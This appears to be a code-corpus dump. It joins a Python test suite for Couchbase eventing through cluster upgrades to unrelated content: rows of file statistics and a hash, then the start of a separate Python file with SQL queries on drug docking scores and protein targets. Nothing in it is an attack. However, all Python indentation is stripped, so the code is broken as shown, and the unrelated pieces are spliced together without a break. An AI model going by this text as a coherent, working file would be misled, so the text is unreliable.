def test_offline_upgrade_with_eventing_pre_vulcan(self):
self._install(self.servers[:self.nodes_init])
self.operations(self.servers[:self.nodes_init], services="kv,kv,index,n1ql")
self.create_buckets()
# Load the data in older version
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
# upgrade all the nodes
upgrade_threads = self._async_update(self.upgrade_version, self.servers)
for upgrade_thread in upgrade_threads:
upgrade_thread.join()
self.sleep(120)
success_upgrade = True
while not self.queue.empty():
success_upgrade &= self.queue.get()
if not success_upgrade:
self.fail("Upgrade failed!")
self.add_built_in_server_user()
# Add eventing node to the cluster after upgrade
self.cluster.rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=["eventing"])
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
self.import_function(EXPORTED_FUNCTION.BUCKET_OP)
self.sleep(180)
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
### for this to work upgrade_version > 5.5
def test_offline_upgrade_with_eventing(self):
self._install(self.servers[:self.nodes_init])
self.operations(self.servers[:self.nodes_init], services="kv,eventing,index,n1ql")
self.create_buckets()
# Load the data in older version
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Deploy the bucket op function
log.info("Deploy the function in the initial version")
self.import_function(EXPORTED_FUNCTION.BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
# offline upgrade all the nodes
upgrade_threads = self._async_update(self.upgrade_version, self.servers)
for upgrade_thread in upgrade_threads:
upgrade_thread.join()
self.sleep(120)
success_upgrade = True
while not self.queue.empty():
success_upgrade &= self.queue.get()
if not success_upgrade:
self.fail("Upgrade failed!")
self.add_built_in_server_user()
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Deploy the bucket op with timer function
self.import_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
# Validate the data
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
# Load the data in older version
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
#Deploy the Source bucket handler
self.import_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
# Validate the data
self.validate_eventing(self.source_bucket_mutation, 2*self.docs_per_day * 2016)
# Deploy the curl handler
self.import_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
### index creation for n1ql
self._create_primary_index()
# deploy n1ql handler
self.import_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
# Delete the data on source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False, op_type='delete')
# Delete the data on SBM bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False, op_type='delete')
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, 0)
self.validate_eventing(self.dst_bucket_name1, 0)
self.validate_eventing(self.source_bucket_mutation,0)
self.validate_eventing(self.dst_bucket_curl,0)
self.validate_eventing(self.n1ql_op_dst,0)
## pause handler
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.pause_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.N1QL_OP)
# add data to source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
# add data to SBM bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
# resume function
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.resume_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Undeploy and delete both the functions
self.undeploy_and_delete_function("test_import_function_1")
self.undeploy_and_delete_function("test_import_function_2")
self.undeploy_and_delete_function('bucket_op_sbm')
self.undeploy_and_delete_function('bucket_op_curl')
self.undeploy_and_delete_function('n1ql_op')
### for this to work current version > 5.5
def test_offline_upgrade_with_eventing_post_vulcan(self):
self._install(self.servers[:self.nodes_init])
self.operations(self.servers[:self.nodes_init], services="kv,eventing,index,n1ql")
self.create_buckets()
# Load the data in older version
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Deploy the bucket op function
log.info("Deploy the function in the initial version")
self.import_function(EXPORTED_FUNCTION.BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
# Deploy the bucket op with timer function
self.import_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
# Validate the data
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
# offline upgrade all the nodes
upgrade_threads = self._async_update(self.upgrade_version, self.servers)
for upgrade_thread in upgrade_threads:
upgrade_thread.join()
self.sleep(120)
success_upgrade = True
while not self.queue.empty():
success_upgrade &= self.queue.get()
if not success_upgrade:
self.fail("Upgrade failed!")
self.add_built_in_server_user()
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Load the data source bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.import_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
# Validate the data
self.validate_eventing(self.source_bucket_mutation, 2*self.docs_per_day * 2016)
# Deploy the Source bucket handler
self.import_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
### index creation for n1ql
self._create_primary_index()
# Deploy the n1ql handler
self.import_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
# Delete the data on source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False, op_type='delete')
# Delete the data on SBM bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False, op_type='delete')
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, 0)
self.validate_eventing(self.dst_bucket_name1, 0)
self.validate_eventing(self.source_bucket_mutation,0)
self.validate_eventing(self.dst_bucket_curl,0)
self.validate_eventing(self.n1ql_op_dst,0)
## pause resume handler
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.pause_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.N1QL_OP)
# add data to source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.resume_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
self.validate_eventing(self.source_bucket_mutation, 2*self.docs_per_day * 2016)
# Undeploy and delete both the functions
self.undeploy_and_delete_function("test_import_function_1")
self.undeploy_and_delete_function("test_import_function_2")
self.undeploy_and_delete_function('bucket_op_sbm')
self.undeploy_and_delete_function('bucket_op_curl')
self.undeploy_and_delete_function('n1ql_op')
def test_online_upgrade_with_regular_rebalance_with_eventing(self):
self._install(self.servers[:self.nodes_init])
self.initial_version = self.upgrade_version
self._install(self.servers[self.nodes_init:self.num_servers])
self.operations(self.servers[:self.nodes_init], services="kv,eventing,index,n1ql")
self.create_buckets()
# Load the data in older version
log.info("Load the data in older version in the initial version")
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Deploy the bucket op function
log.info("Deploy the function in the initial version")
self.import_function(EXPORTED_FUNCTION.BUCKET_OP)
# Do validations
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
# swap and rebalance the servers
self.online_upgrade(services=["kv", "eventing", "index", "n1ql"])
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
self.add_built_in_server_user()
# Deploy the bucket op with timer function
self.import_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
# Do validations
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
# Load the data source bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.import_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
# Validate the data
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Deploy the Source bucket handler
self.import_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
### index creation for n1ql
self._create_primary_index()
# Deploy the n1ql handler
self.import_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
# Delete the data on source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False, op_type='delete')
# Delete the data on SBM bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False, op_type='delete')
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, 0)
self.validate_eventing(self.dst_bucket_name1, 0)
self.validate_eventing(self.source_bucket_mutation, 0)
self.validate_eventing(self.dst_bucket_curl, 0)
self.validate_eventing(self.n1ql_op_dst, 0)
## pause resume handler
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.pause_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.N1QL_OP)
# add data to source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.resume_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Undeploy and delete both the functions
self.undeploy_and_delete_function("test_import_function_1")
self.undeploy_and_delete_function("test_import_function_2")
self.undeploy_and_delete_function('bucket_op_sbm')
self.undeploy_and_delete_function('bucket_op_curl')
self.undeploy_and_delete_function('n1ql_op')
def test_online_upgrade_with_swap_rebalance_with_eventing(self):
self._install(self.servers[:self.nodes_init])
self.initial_version = self.upgrade_version
self._install(self.servers[self.nodes_init:self.num_servers])
self.operations(self.servers[:self.nodes_init], services="kv,kv,eventing,index,n1ql")
self.create_buckets()
# Load the data in older version
log.info("Load the data in older version in the initial version")
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Deploy the bucket op function
log.info("Deploy the function in the initial version")
self.import_function(EXPORTED_FUNCTION.BUCKET_OP)
# Do validations
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
# swap and rebalance the servers
self.online_upgrade_swap_rebalance(services=["kv","kv", "eventing","index","n1ql"])
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
self.add_built_in_server_user()
# Deploy the bucket op with timer function
self.import_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
# Do validations
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
# Load the data source bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.import_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
# Validate the data
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Deploy the Source bucket handler
self.import_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
### index creation for n1ql
self._create_primary_index()
# Deploy the n1ql handler
self.import_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
# Delete the data on source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False, op_type='delete')
# Delete the data on SBM bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False, op_type='delete')
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, 0)
self.validate_eventing(self.dst_bucket_name1, 0)
self.validate_eventing(self.source_bucket_mutation, 0)
self.validate_eventing(self.dst_bucket_curl, 0)
self.validate_eventing(self.n1ql_op_dst, 0)
## pause resume handler
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.pause_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.N1QL_OP)
# add data to source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.resume_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Undeploy and delete both the functions
self.undeploy_and_delete_function("test_import_function_1")
self.undeploy_and_delete_function("test_import_function_2")
self.undeploy_and_delete_function('bucket_op_sbm')
self.undeploy_and_delete_function('bucket_op_curl')
self.undeploy_and_delete_function('n1ql_op')
def test_online_upgrade_with_failover_rebalance_with_eventing(self):
self._install(self.servers[:self.nodes_init])
self.initial_version = self.upgrade_version
self._install(self.servers[self.nodes_init:self.num_servers])
self.operations(self.servers[:self.nodes_init], services="kv,eventing,index,n1ql")
self.create_buckets()
# Load the data in older version
log.info("Load the data in older version in the initial version")
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Deploy the bucket op function
log.info("Deploy the function in the initial version")
self.import_function(EXPORTED_FUNCTION.BUCKET_OP)
# Do validations
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
# swap and rebalance the servers
self.online_upgrade_with_failover(services=["kv", "eventing", "index", "n1ql"])
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
self.add_built_in_server_user()
# Deploy the bucket op with timer function
self.import_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
# Do validations
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
# Load the data source bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.import_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
# Validate the data
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Deploy the Source bucket handler
self.import_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
### index creation for n1ql
self._create_primary_index()
# Deploy the n1ql handler
self.import_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
# Delete the data on source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False, op_type='delete')
# Delete the data on SBM bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False, op_type='delete')
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, 0)
self.validate_eventing(self.dst_bucket_name1, 0)
self.validate_eventing(self.source_bucket_mutation, 0)
self.validate_eventing(self.dst_bucket_curl, 0)
self.validate_eventing(self.n1ql_op_dst, 0)
## pause resume handler
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.pause_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.N1QL_OP)
# add data to source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.resume_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Undeploy and delete both the functions
self.undeploy_and_delete_function("test_import_function_1")
self.undeploy_and_delete_function("test_import_function_2")
self.undeploy_and_delete_function('bucket_op_sbm')
self.undeploy_and_delete_function('bucket_op_curl')
self.undeploy_and_delete_function('n1ql_op')
def import_function(self, function):
script_dir = os.path.dirname(__file__)
abs_file_path = os.path.join(script_dir, function)
fh = open(abs_file_path, "r")
body = json.loads(fh.read())
# import the previously exported function
self.rest.save_function(body["appname"], body)
self.deploy_function(body)
def online_upgrade(self, services=None):
servers_in = self.servers[self.nodes_init:self.num_servers]
self.cluster.rebalance(self.servers[:self.nodes_init], servers_in, [], services=services)
log.info("Rebalance in all {0} nodes" \
.format(self.input.param("upgrade_version", "")))
self.sleep(self.sleep_time)
status, content = ClusterOperationHelper.find_orchestrator(self.master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}". \
format(status, content))
FIND_MASTER = False
for new_server in servers_in:
if content.find(new_server.ip) >= 0:
self._new_master(new_server)
FIND_MASTER = True
self.log.info("%s node %s becomes the master" \
% (self.input.param("upgrade_version", ""), new_server.ip))
break
if self.input.param("initial_version", "")[:5] in COUCHBASE_VERSION_2 \
and not FIND_MASTER:
raise Exception( \
"After rebalance in {0} nodes, {0} node doesn't become master" \
.format(self.input.param("upgrade_version", "")))
servers_out = self.servers[:self.nodes_init]
log.info("Rebalanced out all old version nodes")
self.cluster.rebalance(self.servers[:self.num_servers], [], servers_out)
self._new_master(self.servers[self.nodes_init])
def online_upgrade_swap_rebalance(self, services=None):
servers_in = self.servers[self.nodes_init:self.num_servers]
self.sleep(self.sleep_time)
status, content = ClusterOperationHelper.find_orchestrator(self.master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}". \
format(status, content))
i = 1
for server_in, service_in in zip(servers_in[1:], services[1:]):
log.info(
"Swap rebalance nodes : server_in: {0} service_in:{1} service_out:{2}".format(server_in, service_in,
self.servers[i]))
self.cluster.rebalance(self.servers[:self.nodes_init], [server_in], [self.servers[i]],
services=[service_in])
i += 1
self._new_master(self.servers[self.nodes_init + 1])
self.cluster.rebalance(self.servers[self.nodes_init + 1:self.num_servers], [servers_in[0]], [self.servers[0]],
services=[services[0]])
def online_upgrade_with_failover(self, services=None):
servers_in = self.servers[self.nodes_init:self.num_servers]
self.cluster.rebalance(self.servers[:self.nodes_init], servers_in, [], services=services)
log.info("Rebalance in all {0} nodes" \
.format(self.input.param("upgrade_version", "")))
self.sleep(self.sleep_time)
status, content = ClusterOperationHelper.find_orchestrator(self.master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}". \
format(status, content))
FIND_MASTER = False
for new_server in servers_in:
if content.find(new_server.ip) >= 0:
self._new_master(new_server)
FIND_MASTER = True
self.log.info("%s node %s becomes the master" \
% (self.input.param("upgrade_version", ""), new_server.ip))
break
if self.input.param("initial_version", "")[:5] in COUCHBASE_VERSION_2 \
and not FIND_MASTER:
raise Exception( \
"After rebalance in {0} nodes, {0} node doesn't become master" \
.format(self.input.param("upgrade_version", "")))
servers_out = self.servers[:self.nodes_init]
self._new_master(self.servers[self.nodes_init])
log.info("failover and rebalance nodes")
self.cluster.failover(self.servers[:self.num_servers], failover_nodes=servers_out, graceful=False)
self.cluster.rebalance(self.servers[:self.num_servers], [], servers_out)
self.sleep(180)
def _new_master(self, server):
self.master = server
self.rest = RestConnection(self.master)
self.rest_helper = RestHelper(self.rest)
def create_buckets(self):
self.rest.set_service_memoryQuota(service='memoryQuota', memoryQuota=1000)
self.rest.delete_bucket("default")
self.bucket_size = 100
log.info("Create the required buckets in the initial version")
bucket_params = self._create_bucket_params(server=self.server, size=self.bucket_size,
replicas=self.num_replicas)
self.cluster.create_standard_bucket(name=self.src_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.src_bucket = RestConnection(self.master).get_buckets()
self.sleep(60)
self.cluster.create_standard_bucket(name=self.dst_bucket_name, port=STANDARD_BUCKET_PORT + 2,
bucket_params=bucket_params)
self.sleep(60)
self.cluster.create_standard_bucket(name=self.metadata_bucket_name, port=STANDARD_BUCKET_PORT + 3,
bucket_params=bucket_params)
self.sleep(60)
self.cluster.create_standard_bucket(name=self.dst_bucket_name1, port=STANDARD_BUCKET_PORT + 4,
bucket_params=bucket_params)
self.sleep(60)
self.cluster.create_standard_bucket(name=self.dst_bucket_curl, port=STANDARD_BUCKET_PORT + 5,
bucket_params=bucket_params)
self.sleep(60)
self.cluster.create_standard_bucket(name=self.source_bucket_mutation, port=STANDARD_BUCKET_PORT + 6,
bucket_params=bucket_params)
self.sleep(60)
self.cluster.create_standard_bucket(name=self.n1ql_op_dst, port=STANDARD_BUCKET_PORT + 7,
bucket_params=bucket_params)
self.buckets = RestConnection(self.master).get_buckets()
self.sbm = RestConnection(self.master).get_bucket_by_name(self.source_bucket_mutation)
def validate_eventing(self, bucket_name, no_of_docs):
count = 0
stats_dst = self.rest.get_bucket_stats(bucket_name)
while stats_dst["curr_items"] != no_of_docs and count < 20:
message = "Waiting for handler code to complete bucket operations... Current : {0} Expected : {1}". \
format(stats_dst["curr_items"], no_of_docs)
self.sleep(30, message=message)
count += 1
stats_dst = self.rest.get_bucket_stats(bucket_name)
if stats_dst["curr_items"] != no_of_docs:
log.info("Eventing is not working as expected after upgrade")
raise Exception(
"Bucket operations from handler code took lot of time to complete or didn't go through. Current : {0} "
"Expected : {1} ".format(stats_dst["curr_items"], no_of_docs))
def deploy_function(self, body, deployment_fail=False, wait_for_bootstrap=True):
body['settings']['deployment_status'] = True
body['settings']['processing_status'] = True
content1 = self.rest.create_function(body['appname'], body)
log.info("deploy Application : {0}".format(content1))
if deployment_fail:
res = json.loads(content1)
if not res["compile_success"]:
return
else:
raise Exception("Deployment is expected to be failed but no message of failure")
if wait_for_bootstrap:
# wait for the function to come out of bootstrap state
self.wait_for_handler_state(body['appname'], "deployed")
def undeploy_and_delete_function(self, function):
log.info("Undeploying function : {0}".format(function))
content = self.rest.undeploy_function(function)
self.wait_for_handler_state(function,"undeployed")
self.sleep(180)
log.info("Deleting function : {0}".format(function))
content1 = self.rest.delete_single_function(function)
def pause_function(self, function):
script_dir = os.path.dirname(__file__)
abs_file_path = os.path.join(script_dir, function)
fh = open(abs_file_path, "r")
body = json.loads(fh.read())
body['settings']['deployment_status'] = True
body['settings']['processing_status'] = False
self.refresh_rest_server()
# save the function so that it is visible in UI
#content = self.rest.save_function(body['appname'], body)
# undeploy the function
content1 = self.rest.set_settings_for_function(body['appname'], body['settings'])
log.info("Pause Application : {0}".format(body['appname']))
self.wait_for_handler_state(body['appname'], "paused")
def resume_function(self,function):
script_dir = os.path.dirname(__file__)
abs_file_path = os.path.join(script_dir, function)
fh = open(abs_file_path, "r")
body = json.loads(fh.read())
### resume function
body['settings']['deployment_status'] = True
body['settings']['processing_status'] = True
if "dcp_stream_boundary" in body['settings']:
body['settings'].pop('dcp_stream_boundary')
log.info("Settings after deleting dcp_stream_boundary : {0}".format(body['settings']))
self.rest.set_settings_for_function(body['appname'], body['settings'])
log.info("Resume Application : {0}".format(body['appname']))
self.wait_for_handler_state(body['appname'], "deployed")
def wait_for_handler_state(self, name,status,iterations=20):
self.sleep(20, message="Waiting for {} to {}...".format(name,status))
result = self.rest.get_composite_eventing_status()
count = 0
composite_status = None
while composite_status != status and count < iterations:
self.sleep(20,"Waiting for {} to {}...".format(name,status))
result = self.rest.get_composite_eventing_status()
for i in range(len(result['apps'])):
if result['apps'][i]['name'] == name:
composite_status = result['apps'][i]['composite_status']
count+=1
if count == iterations:
raise Exception('Eventing took lot of time for handler {} to {}'.format(name,status))
def _create_primary_index(self):
n1ql_node = self.get_nodes_from_services_map(service_type="n1ql")
n1ql_helper = N1QLHelper(shell=self.shell, max_verify=self.max_verify, buckets=self.buckets,
item_flag=self.item_flag, n1ql_port=self.n1ql_port,
full_docs_list=self.full_docs_list, log=self.log, input=self.input,
master=self.master, use_rest=True)
# primary index is required as we run some queries from handler code
n1ql_helper.create_primary_index(using_gsi=True, server=n1ql_node)
| 55.606509
| 119
| 0.691194
| 4,869
| 37,590
| 5.043541
| 0.057301
| 0.045445
| 0.062711
| 0.074276
| 0.841552
| 0.82282
| 0.810482
| 0.801238
| 0.789958
| 0.779045
| 0
| 0.015058
| 0.217345
| 37,590
| 676
| 120
| 55.606509
| 0.819647
| 0.088481
| 0
| 0.73743
| 0
| 0.001862
| 0.088901
| 0.011047
| 0
| 0
| 0
| 0
| 0.005587
| 1
| 0.039106
| false
| 0
| 0.096834
| 0
| 0.139665
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67d03cf46cbeedac4fec6551e7b119e0d01bb6c8
| 7,130
|
py
|
Python
|
medicine/src/Result.py
|
marinajacks/reptilian
|
990cb371a551164828ad40e57df74ebdf5ebf25e
|
[
"MIT"
] | null | null | null |
medicine/src/Result.py
|
marinajacks/reptilian
|
990cb371a551164828ad40e57df74ebdf5ebf25e
|
[
"MIT"
] | null | null | null |
medicine/src/Result.py
|
marinajacks/reptilian
|
990cb371a551164828ad40e57df74ebdf5ebf25e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 13 20:24:45 2018
这个程序专门用来
@author: hello
"""
import pandas as pd
import pymysql
sql0='''
select a.*,b.*,c.*
from
(
select * from docked where scores is not null ORDER BY SCORES
)a
left join target b on a.pdbid =b.pdbid
left join
(select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid
)
c on a.pubchemcid=c.pubchemcid
where c.pubchemcid is not null
'''
sql='''
select *from (select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores ) a where scores between 4.25 and 5
'''
sql1='''
select *from (select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores ) a where scores between 5 and 7
'''
